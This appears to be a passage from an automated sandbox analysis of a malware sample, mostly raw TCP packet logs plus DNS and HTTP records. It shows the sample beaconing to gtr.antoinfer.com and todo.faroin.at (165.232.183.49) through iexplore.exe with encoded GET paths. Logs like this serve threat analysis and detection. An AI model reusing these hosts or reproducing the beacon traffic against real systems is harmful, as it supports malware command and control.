                              Jul 5, 2021 16:52:50.978018999 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.978022099 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.978056908 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.978087902 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.978102922 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.978137016 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.978143930 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.978157997 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.978185892 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.978195906 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.978225946 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.978235960 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.978271008 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.979155064 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.979207993 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.979229927 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.979260921 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.979280949 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.979309082 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:50.979312897 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:50.979357004 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.130850077 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.130918980 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.130979061 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.130981922 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.131030083 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.131048918 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.131052971 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.131119967 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.167356014 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.167443991 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.167493105 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.167526007 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.167581081 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.167660952 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.167679071 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.167722940 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.167758942 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.167795897 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.167798042 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.167823076 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.167834997 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.167840958 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.167870998 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.167871952 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.167886019 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.167910099 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.167924881 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.167948008 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.167954922 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.167992115 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.167994976 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.168030024 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.168042898 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.168076038 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.302565098 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.302707911 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.302824974 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.302886963 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.302917957 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.302926064 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.302963972 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.302992105 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.303000927 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.303002119 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.303030014 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.303039074 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.303061008 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.303078890 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.303101063 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.303145885 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.303180933 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.303200960 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.303219080 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.303261042 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.305439949 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.305486917 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.305526972 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.305567980 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.305604935 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.305661917 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.305727959 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.305738926 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.305744886 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.305748940 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.320436001 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.320626020 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.359169006 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.359328985 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.475931883 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.475989103 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476030111 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476051092 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476068974 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476068974 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476090908 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476109982 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476149082 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476185083 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476187944 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476218939 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476224899 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476227045 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476229906 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476264000 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476284981 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476311922 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476356030 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476372957 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476389885 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476392984 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476404905 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476433039 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476444006 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476469994 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476481915 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476506948 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.476521015 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.476568937 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.491154909 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.491231918 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.523047924 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.523111105 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.523292065 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.523318052 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.546911001 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.547097921 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.646140099 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.646202087 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.646243095 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.646279097 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.646316051 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.646352053 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.646384954 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.646399021 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.646418095 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.646424055 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.646428108 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.646431923 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.646436930 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.646440983 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.646441936 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.646477938 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.646496058 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.646517038 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.646521091 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.646568060 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.647031069 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.647073030 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.647089958 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.647110939 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.647129059 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.647190094 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.647196054 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.647236109 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.647253036 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.647286892 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.664310932 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.664463043 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.691241980 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.691289902 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.691325903 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.691437006 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.691458941 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.692282915 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.712405920 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.712601900 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.817599058 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.817661047 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.817696095 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.817729950 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.817764044 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.817797899 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.817831993 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.817848921 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.817866087 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.817882061 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.817888021 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.817892075 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.817895889 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.817900896 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.817909956 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.817914963 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.817949057 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.817966938 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.818006039 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.818591118 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.818638086 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.818656921 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.818676949 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.818694115 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.818711996 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.818726063 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.818746090 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.818763018 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.818800926 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.840015888 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.840181112 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.864447117 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.864547968 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.864595890 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.867286921 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.867356062 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.867414951 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.867451906 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.868309975 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.880386114 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.880532980 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.989250898 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.989285946 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.989308119 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.989330053 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.989351034 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.989372969 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.989397049 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.989420891 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.989433050 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.989442110 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.989469051 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.989475012 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.989490032 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.992384911 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.992417097 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.992435932 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.992458105 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.992469072 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.992482901 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:51.992511034 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:51.992541075 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.007601023 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.010305882 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.036740065 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.036772013 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.036792994 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.036813021 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.036813974 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.036834955 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.036839008 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.036856890 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.036878109 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.036900043 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.052385092 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.052443981 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.160860062 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.160895109 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.160912037 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.160936117 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.160957098 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.160978079 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.161000013 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.161020994 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.161026001 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.161041021 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.161067963 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.161096096 CEST4972080192.168.2.5165.232.183.49
                              Jul 5, 2021 16:52:52.162153959 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.162182093 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.162203074 CEST8049720165.232.183.49192.168.2.5
                              Jul 5, 2021 16:52:52.162228107 CEST4972080192.168.2.5165.232.183.49

                              UDP Packets


                              DNS Queries

                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                              Jul 5, 2021 16:52:44.827162027 CEST | 192.168.2.5 | 8.8.8.8 | 0xf2f9 | Standard query (0) | gtr.antoinfer.com | A (IP address) | IN (0x0001)
                              Jul 5, 2021 16:52:49.596513987 CEST | 192.168.2.5 | 8.8.8.8 | 0xdae5 | Standard query (0) | gtr.antoinfer.com | A (IP address) | IN (0x0001)
                              Jul 5, 2021 16:52:55.675700903 CEST | 192.168.2.5 | 8.8.8.8 | 0x76c2 | Standard query (0) | gtr.antoinfer.com | A (IP address) | IN (0x0001)
                              Jul 5, 2021 16:53:32.439990997 CEST | 192.168.2.5 | 8.8.8.8 | 0xd2c6 | Standard query (0) | resolver1.opendns.com | A (IP address) | IN (0x0001)
                              Jul 5, 2021 16:53:32.693692923 CEST | 192.168.2.5 | 8.8.8.8 | 0x43c5 | Standard query (0) | todo.faroin.at | A (IP address) | IN (0x0001)
                              Jul 5, 2021 16:53:34.146548986 CEST | 192.168.2.5 | 8.8.8.8 | 0x7a98 | Standard query (0) | todo.faroin.at | A (IP address) | IN (0x0001)
                              Jul 5, 2021 16:53:35.383435965 CEST | 192.168.2.5 | 8.8.8.8 | 0x1cc4 | Standard query (0) | todo.faroin.at | A (IP address) | IN (0x0001)

                              DNS Answers

                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                              Jul 5, 2021 16:52:45.206682920 CEST | 8.8.8.8 | 192.168.2.5 | 0xf2f9 | No error (0) | gtr.antoinfer.com | | 165.232.183.49 | A (IP address) | IN (0x0001)
                              Jul 5, 2021 16:52:49.654650927 CEST | 8.8.8.8 | 192.168.2.5 | 0xdae5 | No error (0) | gtr.antoinfer.com | | 165.232.183.49 | A (IP address) | IN (0x0001)
                              Jul 5, 2021 16:52:56.007304907 CEST | 8.8.8.8 | 192.168.2.5 | 0x76c2 | No error (0) | gtr.antoinfer.com | | 165.232.183.49 | A (IP address) | IN (0x0001)
                              Jul 5, 2021 16:53:32.490406990 CEST | 8.8.8.8 | 192.168.2.5 | 0xd2c6 | No error (0) | resolver1.opendns.com | | 208.67.222.222 | A (IP address) | IN (0x0001)
                              Jul 5, 2021 16:53:33.031008959 CEST | 8.8.8.8 | 192.168.2.5 | 0x43c5 | No error (0) | todo.faroin.at | | 165.232.183.49 | A (IP address) | IN (0x0001)
                              Jul 5, 2021 16:53:34.205434084 CEST | 8.8.8.8 | 192.168.2.5 | 0x7a98 | No error (0) | todo.faroin.at | | 165.232.183.49 | A (IP address) | IN (0x0001)
                              Jul 5, 2021 16:53:35.439306021 CEST | 8.8.8.8 | 192.168.2.5 | 0x1cc4 | No error (0) | todo.faroin.at | | 165.232.183.49 | A (IP address) | IN (0x0001)

                              HTTP Request Dependency Graph

                              • gtr.antoinfer.com
                              • todo.faroin.at

                              HTTP Packets

                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              0 | 192.168.2.5 | 49717 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 5, 2021 16:52:45.440840006 CEST | 1627 | OUT | GET /OQ_2BTgG7j/q3X1MGdBBGa9_2B2m/1G0QfKWqT4Al/JC4ZC0WOm7j/4CP941a6dpq6AY/NxMuCeGanwp5x6mxFdtm_/2BQQ_2BZBXUS0UsE/so7pu77WVpSX0kE/e_2FC7i8m9HUadv_2F/jHuYwYKPu/BKlyw96_2B2HnlpmSd5G/KHfN8q_2FZUhddmueVc/VN22bVsSXOc1F2H2TTIYic/FU2T3AQj_2Bf0/Yc7WUnV_/2FNtnojv1lJnCN4_2B2aG1E/ZT_2F8RuAw/TC3tCpega8r1SAjDV/0ZScgJdMygUO/w95b0xrv2QT/DGrWX40QWt0tWT/QGDiJ9RLs/CJ HTTP/1.1
                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                              Accept-Language: en-US
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Accept-Encoding: gzip, deflate
                              Host: gtr.antoinfer.com
                              Connection: Keep-Alive
                              Jul 5, 2021 16:52:46.348056078 CEST | 1628 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:52:46 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Content-Encoding: gzip


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              1 | 192.168.2.5 | 49718 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 5, 2021 16:52:47.774095058 CEST | 1831 | OUT | GET /favicon.ico HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Host: gtr.antoinfer.com
                              Connection: Keep-Alive
                              Jul 5, 2021 16:52:48.320102930 CEST | 1832 | IN | HTTP/1.1 404 Not Found
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:52:48 GMT
                              Content-Type: text/html; charset=utf-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Content-Encoding: gzip


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              2 | 192.168.2.5 | 49720 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 5, 2021 16:52:49.870625973 CEST | 1833 | OUT | GET /HXJGZh1qBjYM0G/CMDVQercp7WT9ydNTkT_2/BA1T_2BoFtrG_2Bw/Wj8IRI6jThedYoW/YXdrjvBKs_2BWTN1jd/cRVlgWa0o/p1MOk_2BLI89mWlaMirs/Gdw7n3bR8ORjIY_2Fx6/NYz_2BwvSm9u2x0DN_2BOH/Ni1nKLSa9JhBd/ZE9joS5j/ehlmvjX_2FlxlUw7sENHL6w/CDmAOpgIB5/uqJKH_2B5K5P34v5C/Q_2BbSOhpl7C/1na6SsW0l2M/cy_2FPqMdKquM4/T1TrxnsCco2huo0cd5MLY/0H3wDM7jB_2F837m/FO_2FMxSAhLyD6r/IIFbv4aVX2Mk_2FOSl/48WQx68DGUnQj/_2BFfob HTTP/1.1
                              Accept: text/html, application/xhtml+xml, image/jxr, */*
                              Accept-Language: en-US
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                              Accept-Encoding: gzip, deflate
                              Host: gtr.antoinfer.com
                              Connection: Keep-Alive
                              Jul 5, 2021 16:52:50.788218021 CEST | 1835 | IN | HTTP/1.1 200 OK
                              Server: nginx
                              Date: Mon, 05 Jul 2021 14:52:50 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Vary: Accept-Encoding
                              Strict-Transport-Security: max-age=63072000; includeSubdomains
                              X-Content-Type-Options: nosniff
                              Content-Encoding: gzip


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              3 | 192.168.2.5 | 49719 | 165.232.183.49 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                              Timestamp | kBytes transferred | Direction | Data
                              Jul 5, 2021 16:52:53.683702946 CEST | 2097 | OUT | GET /favicon.ico HTTP/1.1
                              Accept: */*
                              Accept-Encoding: gzip, deflate
